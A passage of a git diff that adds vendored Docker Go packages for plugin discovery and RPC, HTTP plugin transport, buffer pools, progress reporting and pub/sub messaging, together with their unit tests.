assertNum(t, 1, len(pkg.Imports)) + importPath := strings.Split(pkg.Imports[0].Path, "/") + assertName(t, "otherfixture\"", importPath[len(importPath)-1]) + assertName(t, "", pkg.Imports[0].Name) + } +} + +func TestAliasedImports(t *testing.T) { + pkg, err := Parse(testFixture, "Fooer12") + if err != nil { + t.Fatal(err) + } + + assertNum(t, 1, len(pkg.Imports)) + assertName(t, "aliasedio", pkg.Imports[0].Name) +} + +func assertName(t *testing.T, expected, actual string) { + if expected != actual { + fatalOut(t, fmt.Sprintf("expected name to be `%s`, got: %s", expected, actual)) + } +} + +func assertNum(t *testing.T, expected, actual int) { + if expected != actual { + fatalOut(t, fmt.Sprintf("expected number to be %d, got: %d", expected, actual)) + } +} + +func fatalOut(t *testing.T, msg string) { + _, file, ln, _ := runtime.Caller(2) + t.Fatalf("%s:%d: %s", filepath.Base(file), ln, msg) +} diff --git a/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/template.go b/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/template.go new file mode 100644 index 0000000000..50ed9293c1 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/template.go @@ -0,0 +1,118 @@ +package main + +import ( + "strings" + "text/template" +) + +func printArgs(args []arg) string { + var argStr []string + for _, arg := range args { + argStr = append(argStr, arg.String()) + } + return strings.Join(argStr, ", ") +} + +func buildImports(specs []importSpec) string { + if len(specs) == 0 { + return `import "errors"` + } + imports := "import(\n" + imports += "\t\"errors\"\n" + for _, i := range specs { + imports += "\t" + i.String() + "\n" + } + imports += ")" + return imports +} + +func marshalType(t string) string { + switch t { + case "error": + // convert error types to plain strings to ensure the values are encoded/decoded properly + return "string" + default: + return t + } +} + +func isErr(t string) bool { + switch t { + case "error": + return true + default: + return false + } +} + +// Need to use this helper due to issues with go-vet +func buildTag(s string) string { + return "+build " + s +} + +var templFuncs = template.FuncMap{ + "printArgs": printArgs, + "marshalType": marshalType, + "isErr": isErr, + "lower": strings.ToLower, + "title": title, + "tag": buildTag, + "imports": buildImports, +} + +func title(s string) string { + if strings.ToLower(s) == "id" { + return "ID" + } + return strings.Title(s) +} + +var generatedTempl = template.Must(template.New("rpc_cient").Funcs(templFuncs).Parse(` +// generated code - DO NOT EDIT +{{ range $k, $v := .BuildTags }} + // {{ tag $k }} {{ end }} + +package {{ .Name }} + +{{ imports .Imports }} + +type client interface{ + Call(string, interface{}, interface{}) error +} + +type {{ .InterfaceType }}Proxy struct { + client +} + +{{ range .Functions }} + type {{ $.InterfaceType }}Proxy{{ .Name }}Request struct{ + {{ range .Args }} + {{ title .Name }} {{ .ArgType }} {{ end }} + } + + type {{ $.InterfaceType }}Proxy{{ .Name }}Response struct{ + {{ range .Returns }} + {{ title .Name }} {{ marshalType .ArgType }} {{ end }} + } + + func (pp *{{ $.InterfaceType }}Proxy) {{ .Name }}({{ printArgs .Args }}) ({{ printArgs .Returns }}) { + var( + req {{ $.InterfaceType }}Proxy{{ .Name }}Request + ret {{ $.InterfaceType }}Proxy{{ .Name }}Response + ) + {{ range .Args }} + req.{{ title .Name }} = {{ lower .Name }} {{ end }} + if err = pp.Call("{{ $.RPCName }}.{{ .Name }}", req, &ret); err != nil { + return + } + {{ range $r := .Returns }} + {{ if isErr .ArgType }} + if ret.{{ title .Name }} != "" { + {{ lower .Name }} = errors.New(ret.{{ title .Name }}) + } {{ end }} + {{ if isErr .ArgType | not }} {{ lower .Name }} = ret.{{ title .Name }} {{ end }} {{ end }} + + return + } +{{ end }} +`)) diff --git a/vendor/github.com/docker/docker/pkg/plugins/plugins.go b/vendor/github.com/docker/docker/pkg/plugins/plugins.go new file mode 100644 index 0000000000..c0059cba75 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/plugins/plugins.go @@ -0,0 +1,329 @@ +// Package plugins provides structures and helper functions to manage Docker +// plugins. +// +// Docker discovers plugins by looking for them in the plugin directory whenever +// a user or container tries to use one by name. UNIX domain socket files must +// be located under /run/docker/plugins, whereas spec files can be located +// either under /etc/docker/plugins or /usr/lib/docker/plugins. This is handled +// by the Registry interface, which lets you list all plugins or get a plugin by +// its name if it exists. +// +// The plugins need to implement an HTTP server and bind this to the UNIX socket +// or the address specified in the spec files. +// A handshake is send at /Plugin.Activate, and plugins are expected to return +// a Manifest with a list of of Docker subsystems which this plugin implements. +// +// In order to use a plugins, you can use the ``Get`` with the name of the +// plugin and the subsystem it implements. +// +// plugin, err := plugins.Get("example", "VolumeDriver") +// if err != nil { +// return fmt.Errorf("Error looking up volume plugin example: %v", err) +// } +package plugins + +import ( + "errors" + "sync" + "time" + + "github.com/Sirupsen/logrus" + "github.com/docker/go-connections/tlsconfig" +) + +var ( + // ErrNotImplements is returned if the plugin does not implement the requested driver. + ErrNotImplements = errors.New("Plugin does not implement the requested driver") +) + +type plugins struct { + sync.Mutex + plugins map[string]*Plugin +} + +type extpointHandlers struct { + sync.RWMutex + extpointHandlers map[string][]func(string, *Client) +} + +var ( + storage = plugins{plugins: make(map[string]*Plugin)} + handlers = extpointHandlers{extpointHandlers: make(map[string][]func(string, *Client))} +) + +// Manifest lists what a plugin implements. +type Manifest struct { + // List of subsystem the plugin implements. + Implements []string +} + +// Plugin is the definition of a docker plugin. +type Plugin struct { + // Name of the plugin + name string + // Address of the plugin + Addr string + // TLS configuration of the plugin + TLSConfig *tlsconfig.Options + // Client attached to the plugin + client *Client + // Manifest of the plugin (see above) + Manifest *Manifest `json:"-"` + + // wait for activation to finish + activateWait *sync.Cond + // error produced by activation + activateErr error + // keeps track of callback handlers run against this plugin + handlersRun bool +} + +// Name returns the name of the plugin. +func (p *Plugin) Name() string { + return p.name +} + +// Client returns a ready-to-use plugin client that can be used to communicate with the plugin. +func (p *Plugin) Client() *Client { + return p.client +} + +// IsV1 returns true for V1 plugins and false otherwise. +func (p *Plugin) IsV1() bool { + return true +} + +// NewLocalPlugin creates a new local plugin. +func NewLocalPlugin(name, addr string) *Plugin { + return &Plugin{ + name: name, + Addr: addr, + // TODO: change to nil + TLSConfig: &tlsconfig.Options{InsecureSkipVerify: true}, + activateWait: sync.NewCond(&sync.Mutex{}), + } +} + +func (p *Plugin) activate() error { + p.activateWait.L.Lock() + + if p.activated() { + p.runHandlers() + p.activateWait.L.Unlock() + return p.activateErr + } + + p.activateErr = p.activateWithLock() + + p.runHandlers() + p.activateWait.L.Unlock() + p.activateWait.Broadcast() + return p.activateErr +} + +// runHandlers runs the registered handlers for the implemented plugin types +// This should only be run after activation, and while the activation lock is held. +func (p *Plugin) runHandlers() { + if !p.activated() { + return + } + + handlers.RLock() + if !p.handlersRun { + for _, iface := range p.Manifest.Implements { + hdlrs, handled := handlers.extpointHandlers[iface] + if !handled { + continue + } + for _, handler := range hdlrs { + handler(p.name, p.client) + } + } + p.handlersRun = true + } + handlers.RUnlock() + +} + +// activated returns if the plugin has already been activated. +// This should only be called with the activation lock held +func (p *Plugin) activated() bool { + return p.Manifest != nil +} + +func (p *Plugin) activateWithLock() error { + c, err := NewClient(p.Addr, p.TLSConfig) + if err != nil { + return err + } + p.client = c + + m := new(Manifest) + if err = p.client.Call("Plugin.Activate", nil, m); err != nil { + return err + } + + p.Manifest = m + return nil +} + +func (p *Plugin) waitActive() error { + p.activateWait.L.Lock() + for !p.activated() && p.activateErr == nil { + p.activateWait.Wait() + } + p.activateWait.L.Unlock() + return p.activateErr +} + +func (p *Plugin) implements(kind string) bool { + if p.Manifest == nil { + return false + } + for _, driver := range p.Manifest.Implements { + if driver == kind { + return true + } + } + return false +} + +func load(name string) (*Plugin, error) { + return loadWithRetry(name, true) +} + +func loadWithRetry(name string, retry bool) (*Plugin, error) { + registry := newLocalRegistry() + start := time.Now() + + var retries int + for { + pl, err := registry.Plugin(name) + if err != nil { + if !retry { + return nil, err + } + + timeOff := backoff(retries) + if abort(start, timeOff) { + return nil, err + } + retries++ + logrus.Warnf("Unable to locate plugin: %s, retrying in %v", name, timeOff) + time.Sleep(timeOff) + continue + } + + storage.Lock() + if pl, exists := storage.plugins[name]; exists { + storage.Unlock() + return pl, pl.activate() + } + storage.plugins[name] = pl + storage.Unlock() + + err = pl.activate() + + if err != nil { + storage.Lock() + delete(storage.plugins, name) + storage.Unlock() + } + + return pl, err + } +} + +func get(name string) (*Plugin, error) { + storage.Lock() + pl, ok := storage.plugins[name] + storage.Unlock() + if ok { + return pl, pl.activate() + } + return load(name) +} + +// Get returns the plugin given the specified name and requested implementation. +func Get(name, imp string) (*Plugin, error) { + pl, err := get(name) + if err != nil { + return nil, err + } + if err := pl.waitActive(); err == nil && pl.implements(imp) { + logrus.Debugf("%s implements: %s", name, imp) + return pl, nil + } + return nil, ErrNotImplements +} + +// Handle adds the specified function to the extpointHandlers. +func Handle(iface string, fn func(string, *Client)) { + handlers.Lock() + hdlrs, ok := handlers.extpointHandlers[iface] + if !ok { + hdlrs = []func(string, *Client){} + } + + hdlrs = append(hdlrs, fn) + handlers.extpointHandlers[iface] = hdlrs + + storage.Lock() + for _, p := range storage.plugins { + p.activateWait.L.Lock() + if p.activated() && p.implements(iface) { + p.handlersRun = false + } + p.activateWait.L.Unlock() + } + storage.Unlock() + + handlers.Unlock() +} + +// GetAll returns all the plugins for the specified implementation +func GetAll(imp string) ([]*Plugin, error) { + pluginNames, err := Scan() + if err != nil { + return nil, err + } + + type plLoad struct { + pl *Plugin + err error + } + + chPl := make(chan *plLoad, len(pluginNames)) + var wg sync.WaitGroup + for _, name := range pluginNames { + storage.Lock() + pl, ok := storage.plugins[name] + storage.Unlock() + if ok { + chPl <- &plLoad{pl, nil} + continue + } + + wg.Add(1) + go func(name string) { + defer wg.Done() + pl, err := loadWithRetry(name, false) + chPl <- &plLoad{pl, err} + }(name) + } + + wg.Wait() + close(chPl) + + var out []*Plugin + for pl := range chPl { + if pl.err != nil { + logrus.Error(pl.err) + continue + } + if err := pl.pl.waitActive(); err == nil && pl.pl.implements(imp) { + out = append(out, pl.pl) + } + } + return out, nil +} diff --git a/vendor/github.com/docker/docker/pkg/plugins/plugins_linux.go b/vendor/github.com/docker/docker/pkg/plugins/plugins_linux.go new file mode 100644 index 0000000000..9c5a0b5632 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/plugins/plugins_linux.go @@ -0,0 +1,7 @@ +package plugins + +// BasePath returns the path to which all paths returned by the plugin are relative to. +// For v1 plugins, this always returns the host's root directory. +func (p *Plugin) BasePath() string { + return "/" +} diff --git a/vendor/github.com/docker/docker/pkg/plugins/plugins_windows.go b/vendor/github.com/docker/docker/pkg/plugins/plugins_windows.go new file mode 100644 index 0000000000..3c8d8feb83 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/plugins/plugins_windows.go @@ -0,0 +1,8 @@ +package plugins + +// BasePath returns the path to which all paths returned by the plugin are relative to. +// For Windows v1 plugins, this returns an empty string, since the plugin is already aware +// of the absolute path of the mount. +func (p *Plugin) BasePath() string { + return "" +} diff --git a/vendor/github.com/docker/docker/pkg/plugins/transport/http.go b/vendor/github.com/docker/docker/pkg/plugins/transport/http.go new file mode 100644 index 0000000000..5be146af65 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/plugins/transport/http.go @@ -0,0 +1,36 @@ +package transport + +import ( + "io" + "net/http" +) + +// httpTransport holds an http.RoundTripper +// and information about the scheme and address the transport +// sends request to. +type httpTransport struct { + http.RoundTripper + scheme string + addr string +} + +// NewHTTPTransport creates a new httpTransport. +func NewHTTPTransport(r http.RoundTripper, scheme, addr string) Transport { + return httpTransport{ + RoundTripper: r, + scheme: scheme, + addr: addr, + } +} + +// NewRequest creates a new http.Request and sets the URL +// scheme and address with the transport's fields. +func (t httpTransport) NewRequest(path string, data io.Reader) (*http.Request, error) { + req, err := newHTTPRequest(path, data) + if err != nil { + return nil, err + } + req.URL.Scheme = t.scheme + req.URL.Host = t.addr + return req, nil +} diff --git a/vendor/github.com/docker/docker/pkg/plugins/transport/transport.go b/vendor/github.com/docker/docker/pkg/plugins/transport/transport.go new file mode 100644 index 0000000000..d7f1e2100c --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/plugins/transport/transport.go @@ -0,0 +1,36 @@ +package transport + +import ( + "io" + "net/http" + "strings" +) + +// VersionMimetype is the Content-Type the engine sends to plugins. +const VersionMimetype = "application/vnd.docker.plugins.v1.2+json" + +// RequestFactory defines an interface that +// transports can implement to create new requests. +type RequestFactory interface { + NewRequest(path string, data io.Reader) (*http.Request, error) +} + +// Transport defines an interface that plugin transports +// must implement. +type Transport interface { + http.RoundTripper + RequestFactory +} + +// newHTTPRequest creates a new request with a path and a body. +func newHTTPRequest(path string, data io.Reader) (*http.Request, error) { + if !strings.HasPrefix(path, "/") { + path = "/" + path + } + req, err := http.NewRequest("POST", path, data) + if err != nil { + return nil, err + } + req.Header.Add("Accept", VersionMimetype) + return req, nil +} diff --git a/vendor/github.com/docker/docker/pkg/pools/pools.go b/vendor/github.com/docker/docker/pkg/pools/pools.go new file mode 100644 index 0000000000..5c5aead698 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/pools/pools.go @@ -0,0 +1,116 @@ +// Package pools provides a collection of pools which provide various +// data types with buffers. These can be used to lower the number of +// memory allocations and reuse buffers. +// +// New pools should be added to this package to allow them to be +// shared across packages. +// +// Utility functions which operate on pools should be added to this +// package to allow them to be reused. +package pools + +import ( + "bufio" + "io" + "sync" + + "github.com/docker/docker/pkg/ioutils" +) + +var ( + // BufioReader32KPool is a pool which returns bufio.Reader with a 32K buffer. + BufioReader32KPool = newBufioReaderPoolWithSize(buffer32K) + // BufioWriter32KPool is a pool which returns bufio.Writer with a 32K buffer. + BufioWriter32KPool = newBufioWriterPoolWithSize(buffer32K) +) + +const buffer32K = 32 * 1024 + +// BufioReaderPool is a bufio reader that uses sync.Pool. +type BufioReaderPool struct { + pool sync.Pool +} + +// newBufioReaderPoolWithSize is unexported because new pools should be +// added here to be shared where required. +func newBufioReaderPoolWithSize(size int) *BufioReaderPool { + return &BufioReaderPool{ + pool: sync.Pool{ + New: func() interface{} { return bufio.NewReaderSize(nil, size) }, + }, + } +} + +// Get returns a bufio.Reader which reads from r. The buffer size is that of the pool. +func (bufPool *BufioReaderPool) Get(r io.Reader) *bufio.Reader { + buf := bufPool.pool.Get().(*bufio.Reader) + buf.Reset(r) + return buf +} + +// Put puts the bufio.Reader back into the pool. +func (bufPool *BufioReaderPool) Put(b *bufio.Reader) { + b.Reset(nil) + bufPool.pool.Put(b) +} + +// Copy is a convenience wrapper which uses a buffer to avoid allocation in io.Copy. +func Copy(dst io.Writer, src io.Reader) (written int64, err error) { + buf := BufioReader32KPool.Get(src) + written, err = io.Copy(dst, buf) + BufioReader32KPool.Put(buf) + return +} + +// NewReadCloserWrapper returns a wrapper which puts the bufio.Reader back +// into the pool and closes the reader if it's an io.ReadCloser. +func (bufPool *BufioReaderPool) NewReadCloserWrapper(buf *bufio.Reader, r io.Reader) io.ReadCloser { + return ioutils.NewReadCloserWrapper(r, func() error { + if readCloser, ok := r.(io.ReadCloser); ok { + readCloser.Close() + } + bufPool.Put(buf) + return nil + }) +} + +// BufioWriterPool is a bufio writer that uses sync.Pool. +type BufioWriterPool struct { + pool sync.Pool +} + +// newBufioWriterPoolWithSize is unexported because new pools should be +// added here to be shared where required. +func newBufioWriterPoolWithSize(size int) *BufioWriterPool { + return &BufioWriterPool{ + pool: sync.Pool{ + New: func() interface{} { return bufio.NewWriterSize(nil, size) }, + }, + } +} + +// Get returns a bufio.Writer which writes to w. The buffer size is that of the pool. +func (bufPool *BufioWriterPool) Get(w io.Writer) *bufio.Writer { + buf := bufPool.pool.Get().(*bufio.Writer) + buf.Reset(w) + return buf +} + +// Put puts the bufio.Writer back into the pool. +func (bufPool *BufioWriterPool) Put(b *bufio.Writer) { + b.Reset(nil) + bufPool.pool.Put(b) +} + +// NewWriteCloserWrapper returns a wrapper which puts the bufio.Writer back +// into the pool and closes the writer if it's an io.Writecloser. +func (bufPool *BufioWriterPool) NewWriteCloserWrapper(buf *bufio.Writer, w io.Writer) io.WriteCloser { + return ioutils.NewWriteCloserWrapper(w, func() error { + buf.Flush() + if writeCloser, ok := w.(io.WriteCloser); ok { + writeCloser.Close() + } + bufPool.Put(buf) + return nil + }) +} diff --git a/vendor/github.com/docker/docker/pkg/pools/pools_test.go b/vendor/github.com/docker/docker/pkg/pools/pools_test.go new file mode 100644 index 0000000000..1661b780c9 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/pools/pools_test.go @@ -0,0 +1,161 @@ +package pools + +import ( + "bufio" + "bytes" + "io" + "strings" + "testing" +) + +func TestBufioReaderPoolGetWithNoReaderShouldCreateOne(t *testing.T) { + reader := BufioReader32KPool.Get(nil) + if reader == nil { + t.Fatalf("BufioReaderPool should have create a bufio.Reader but did not.") + } +} + +func TestBufioReaderPoolPutAndGet(t *testing.T) { + sr := bufio.NewReader(strings.NewReader("foobar")) + reader := BufioReader32KPool.Get(sr) + if reader == nil { + t.Fatalf("BufioReaderPool should not return a nil reader.") + } + // verify the first 3 byte + buf1 := make([]byte, 3) + _, err := reader.Read(buf1) + if err != nil { + t.Fatal(err) + } + if actual := string(buf1); actual != "foo" { + t.Fatalf("The first letter should have been 'foo' but was %v", actual) + } + BufioReader32KPool.Put(reader) + // Try to read the next 3 bytes + _, err = sr.Read(make([]byte, 3)) + if err == nil || err != io.EOF { + t.Fatalf("The buffer should have been empty, issue an EOF error.") + } +} + +type simpleReaderCloser struct { + io.Reader + closed bool +} + +func (r *simpleReaderCloser) Close() error { + r.closed = true + return nil +} + +func TestNewReadCloserWrapperWithAReadCloser(t *testing.T) { + br := bufio.NewReader(strings.NewReader("")) + sr := &simpleReaderCloser{ + Reader: strings.NewReader("foobar"), + closed: false, + } + reader := BufioReader32KPool.NewReadCloserWrapper(br, sr) + if reader == nil { + t.Fatalf("NewReadCloserWrapper should not return a nil reader.") + } + // Verify the content of reader + buf := make([]byte, 3) + _, err := reader.Read(buf) + if err != nil { + t.Fatal(err) + } + if actual := string(buf); actual != "foo" { + t.Fatalf("The first 3 letter should have been 'foo' but were %v", actual) + } + reader.Close() + // Read 3 more bytes "bar" + _, err = reader.Read(buf) + if err != nil { + t.Fatal(err) + } + if actual := string(buf); actual != "bar" { + t.Fatalf("The first 3 letter should have been 'bar' but were %v", actual) + } + if !sr.closed { + t.Fatalf("The ReaderCloser should have been closed, it is not.") + } +} + +func TestBufioWriterPoolGetWithNoReaderShouldCreateOne(t *testing.T) { + writer := BufioWriter32KPool.Get(nil) + if writer == nil { + t.Fatalf("BufioWriterPool should have create a bufio.Writer but did not.") + } +} + +func TestBufioWriterPoolPutAndGet(t *testing.T) { + buf := new(bytes.Buffer) + bw := bufio.NewWriter(buf) + writer := BufioWriter32KPool.Get(bw) + if writer == nil { + t.Fatalf("BufioReaderPool should not return a nil writer.") + } + written, err := writer.Write([]byte("foobar")) + if err != nil { + t.Fatal(err) + } + if written != 6 { + t.Fatalf("Should have written 6 bytes, but wrote %v bytes", written) + } + // Make sure we Flush all the way ? + writer.Flush() + bw.Flush() + if len(buf.Bytes()) != 6 { + t.Fatalf("The buffer should contain 6 bytes ('foobar') but contains %v ('%v')", buf.Bytes(), string(buf.Bytes())) + } + // Reset the buffer + buf.Reset() + BufioWriter32KPool.Put(writer) + // Try to write something + if _, err = writer.Write([]byte("barfoo")); err != nil { + t.Fatal(err) + } + // If we now try to flush it, it should panic (the writer is nil) + // recover it + defer func() { + if r := recover(); r == nil { + t.Fatal("Trying to flush the writter should have 'paniced', did not.") + } + }() + writer.Flush() +} + +type simpleWriterCloser struct { + io.Writer + closed bool +} + +func (r *simpleWriterCloser) Close() error { + r.closed = true + return nil +} + +func TestNewWriteCloserWrapperWithAWriteCloser(t *testing.T) { + buf := new(bytes.Buffer) + bw := bufio.NewWriter(buf) + sw := &simpleWriterCloser{ + Writer: new(bytes.Buffer), + closed: false, + } + bw.Flush() + writer := BufioWriter32KPool.NewWriteCloserWrapper(bw, sw) + if writer == nil { + t.Fatalf("BufioReaderPool should not return a nil writer.") + } + written, err := writer.Write([]byte("foobar")) + if err != nil { + t.Fatal(err) + } + if written != 6 { + t.Fatalf("Should have written 6 bytes, but wrote %v bytes", written) + } + writer.Close() + if !sw.closed { + t.Fatalf("The ReaderCloser should have been closed, it is not.") + } +} diff --git a/vendor/github.com/docker/docker/pkg/progress/progress.go b/vendor/github.com/docker/docker/pkg/progress/progress.go new file mode 100644 index 0000000000..fcf31173cf --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/progress/progress.go @@ -0,0 +1,84 @@ +package progress + +import ( + "fmt" +) + +// Progress represents the progress of a transfer. +type Progress struct { + ID string + + // Progress contains a Message or... + Message string + + // ...progress of an action + Action string + Current int64 + Total int64 + + // Aux contains extra information not presented to the user, such as + // digests for push signing. + Aux interface{} + + LastUpdate bool +} + +// Output is an interface for writing progress information. It's +// like a writer for progress, but we don't call it Writer because +// that would be confusing next to ProgressReader (also, because it +// doesn't implement the io.Writer interface). +type Output interface { + WriteProgress(Progress) error +} + +type chanOutput chan<- Progress + +func (out chanOutput) WriteProgress(p Progress) error { + out <- p + return nil +} + +// ChanOutput returns an Output that writes progress updates to the +// supplied channel. +func ChanOutput(progressChan chan<- Progress) Output { + return chanOutput(progressChan) +} + +type discardOutput struct{} + +func (discardOutput) WriteProgress(Progress) error { + return nil +} + +// DiscardOutput returns an Output that discards progress +func DiscardOutput() Output { + return discardOutput{} +} + +// Update is a convenience function to write a progress update to the channel. +func Update(out Output, id, action string) { + out.WriteProgress(Progress{ID: id, Action: action}) +} + +// Updatef is a convenience function to write a printf-formatted progress update +// to the channel. +func Updatef(out Output, id, format string, a ...interface{}) { + Update(out, id, fmt.Sprintf(format, a...)) +} + +// Message is a convenience function to write a progress message to the channel. +func Message(out Output, id, message string) { + out.WriteProgress(Progress{ID: id, Message: message}) +} + +// Messagef is a convenience function to write a printf-formatted progress +// message to the channel. +func Messagef(out Output, id, format string, a ...interface{}) { + Message(out, id, fmt.Sprintf(format, a...)) +} + +// Aux sends auxiliary information over a progress interface, which will not be +// formatted for the UI. This is used for things such as push signing. +func Aux(out Output, a interface{}) { + out.WriteProgress(Progress{Aux: a}) +} diff --git a/vendor/github.com/docker/docker/pkg/progress/progressreader.go b/vendor/github.com/docker/docker/pkg/progress/progressreader.go new file mode 100644 index 0000000000..6b3927eecf --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/progress/progressreader.go @@ -0,0 +1,66 @@ +package progress + +import ( + "io" + "time" + + "golang.org/x/time/rate" +) + +// Reader is a Reader with progress bar. +type Reader struct { + in io.ReadCloser // Stream to read from + out Output // Where to send progress bar to + size int64 + current int64 + lastUpdate int64 + id string + action string + rateLimiter *rate.Limiter +} + +// NewProgressReader creates a new ProgressReader. +func NewProgressReader(in io.ReadCloser, out Output, size int64, id, action string) *Reader { + return &Reader{ + in: in, + out: out, + size: size, + id: id, + action: action, + rateLimiter: rate.NewLimiter(rate.Every(100*time.Millisecond), 1), + } +} + +func (p *Reader) Read(buf []byte) (n int, err error) { + read, err := p.in.Read(buf) + p.current += int64(read) + updateEvery := int64(1024 * 512) //512kB + if p.size > 0 { + // Update progress for every 1% read if 1% < 512kB + if increment := int64(0.01 * float64(p.size)); increment < updateEvery { + updateEvery = increment + } + } + if p.current-p.lastUpdate > updateEvery || err != nil { + p.updateProgress(err != nil && read == 0) + p.lastUpdate = p.current + } + + return read, err +} + +// Close closes the progress reader and its underlying reader. +func (p *Reader) Close() error { + if p.current < p.size { + // print a full progress bar when closing prematurely + p.current = p.size + p.updateProgress(false) + } + return p.in.Close() +} + +func (p *Reader) updateProgress(last bool) { + if last || p.current == p.size || p.rateLimiter.Allow() { + p.out.WriteProgress(Progress{ID: p.id, Action: p.action, Current: p.current, Total: p.size, LastUpdate: last}) + } +} diff --git a/vendor/github.com/docker/docker/pkg/progress/progressreader_test.go b/vendor/github.com/docker/docker/pkg/progress/progressreader_test.go new file mode 100644 index 0000000000..b14d401561 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/progress/progressreader_test.go @@ -0,0 +1,75 @@ +package progress + +import ( + "bytes" + "io" + "io/ioutil" + "testing" +) + +func TestOutputOnPrematureClose(t *testing.T) { + content := []byte("TESTING") + reader := ioutil.NopCloser(bytes.NewReader(content)) + progressChan := make(chan Progress, 10) + + pr := NewProgressReader(reader, ChanOutput(progressChan), int64(len(content)), "Test", "Read") + + part := make([]byte, 4, 4) + _, err := io.ReadFull(pr, part) + if err != nil { + pr.Close() + t.Fatal(err) + } + +drainLoop: + for { + select { + case <-progressChan: + default: + break drainLoop + } + } + + pr.Close() + + select { + case <-progressChan: + default: + t.Fatalf("Expected some output when closing prematurely") + } +} + +func TestCompleteSilently(t *testing.T) { + content := []byte("TESTING") + reader := ioutil.NopCloser(bytes.NewReader(content)) + progressChan := make(chan Progress, 10) + + pr := NewProgressReader(reader, ChanOutput(progressChan), int64(len(content)), "Test", "Read") + + out, err := ioutil.ReadAll(pr) + if err != nil { + pr.Close() + t.Fatal(err) + } + if string(out) != "TESTING" { + pr.Close() + t.Fatalf("Unexpected output %q from reader", string(out)) + } + +drainLoop: + for { + select { + case <-progressChan: + default: + break drainLoop + } + } + + pr.Close() + + select { + case <-progressChan: + t.Fatalf("Should have closed silently when read is complete") + default: + } +} diff --git a/vendor/github.com/docker/docker/pkg/promise/promise.go b/vendor/github.com/docker/docker/pkg/promise/promise.go new file mode 100644 index 0000000000..dd52b9082f --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/promise/promise.go @@ -0,0 +1,11 @@ +package promise + +// Go is a basic promise implementation: it wraps calls a function in a goroutine, +// and returns a channel which will later return the function's return value. +func Go(f func() error) chan error { + ch := make(chan error, 1) + go func() { + ch <- f() + }() + return ch +} diff --git a/vendor/github.com/docker/docker/pkg/pubsub/publisher.go b/vendor/github.com/docker/docker/pkg/pubsub/publisher.go new file mode 100644 index 0000000000..09364617e4 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/pubsub/publisher.go @@ -0,0 +1,111 @@ +package pubsub + +import ( + "sync" + "time" +) + +var wgPool = sync.Pool{New: func() interface{} { return new(sync.WaitGroup) }} + +// NewPublisher creates a new pub/sub publisher to broadcast messages. +// The duration is used as the send timeout as to not block the publisher publishing +// messages to other clients if one client is slow or unresponsive. +// The buffer is used when creating new channels for subscribers. +func NewPublisher(publishTimeout time.Duration, buffer int) *Publisher { + return &Publisher{ + buffer: buffer, + timeout: publishTimeout, + subscribers: make(map[subscriber]topicFunc), + } +} + +type subscriber chan interface{} +type topicFunc func(v interface{}) bool + +// Publisher is basic pub/sub structure. Allows to send events and subscribe +// to them. Can be safely used from multiple goroutines. +type Publisher struct { + m sync.RWMutex + buffer int + timeout time.Duration + subscribers map[subscriber]topicFunc +} + +// Len returns the number of subscribers for the publisher +func (p *Publisher) Len() int { + p.m.RLock() + i := len(p.subscribers) + p.m.RUnlock() + return i +} + +// Subscribe adds a new subscriber to the publisher returning the channel. +func (p *Publisher) Subscribe() chan interface{} { + return p.SubscribeTopic(nil) +} + +// SubscribeTopic adds a new subscriber that filters messages sent by a topic. +func (p *Publisher) SubscribeTopic(topic topicFunc) chan interface{} { + ch := make(chan interface{}, p.buffer) + p.m.Lock() + p.subscribers[ch] = topic + p.m.Unlock() + return ch +} + +// Evict removes the specified subscriber from receiving any more messages. +func (p *Publisher) Evict(sub chan interface{}) { + p.m.Lock() + delete(p.subscribers, sub) + close(sub) + p.m.Unlock() +} + +// Publish sends the data in v to all subscribers currently registered with the publisher. +func (p *Publisher) Publish(v interface{}) { + p.m.RLock() + if len(p.subscribers) == 0 { + p.m.RUnlock() + return + } + + wg := wgPool.Get().(*sync.WaitGroup) + for sub, topic := range p.subscribers { + wg.Add(1) + go p.sendTopic(sub, topic, v, wg) + } + wg.Wait() + wgPool.Put(wg) + p.m.RUnlock() +} + +// Close closes the channels to all subscribers registered with the publisher. +func (p *Publisher) Close() { + p.m.Lock() + for sub := range p.subscribers { + delete(p.subscribers, sub) + close(sub) + } + p.m.Unlock() +} + +func (p *Publisher) sendTopic(sub subscriber, topic topicFunc, v interface{}, wg *sync.WaitGroup) { + defer wg.Done() + if topic != nil && !topic(v) { + return + } + + // send under a select as to not block if the receiver is unavailable + if p.timeout > 0 { + select { + case sub <- v: + case <-time.After(p.timeout): + } + return + } + + select { + case sub <- v: + default: + } +} diff --git a/vendor/github.com/docker/docker/pkg/pubsub/publisher_test.go b/vendor/github.com/docker/docker/pkg/pubsub/publisher_test.go new file mode 100644 index 0000000000..d6b0a1d59a --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/pubsub/publisher_test.go @@ -0,0 +1,142 @@ +package pubsub + +import ( + "fmt" + "testing" + "time" +) + +func TestSendToOneSub(t *testing.T) { + p := NewPublisher(100*time.Millisecond, 10) + c := p.Subscribe() + + p.Publish("hi") + + msg := <-c + if msg.(string) != "hi" { + t.Fatalf("expected message hi but received %v", msg) + } +} + +func TestSendToMultipleSubs(t *testing.T) { + p := NewPublisher(100*time.Millisecond, 10) + subs := []chan interface{}{} + subs = append(subs, p.Subscribe(), p.Subscribe(), p.Subscribe()) + + p.Publish("hi") + + for _, c := range subs { + msg := <-c + if msg.(string) != "hi" { + t.Fatalf("expected message hi but received %v", msg) + } + } +} + +func TestEvictOneSub(t *testing.T) { + p := NewPublisher(100*time.Millisecond, 10) + s1 := p.Subscribe() + s2 := p.Subscribe() + + p.Evict(s1) + p.Publish("hi") + if _, ok := <-s1; ok { + t.Fatal("expected s1 to not receive the published message") + } + + msg := <-s2 + if msg.(string) != "hi" { + t.Fatalf("expected message hi but received %v", msg) + } +} + +func TestClosePublisher(t *testing.T) { + p := 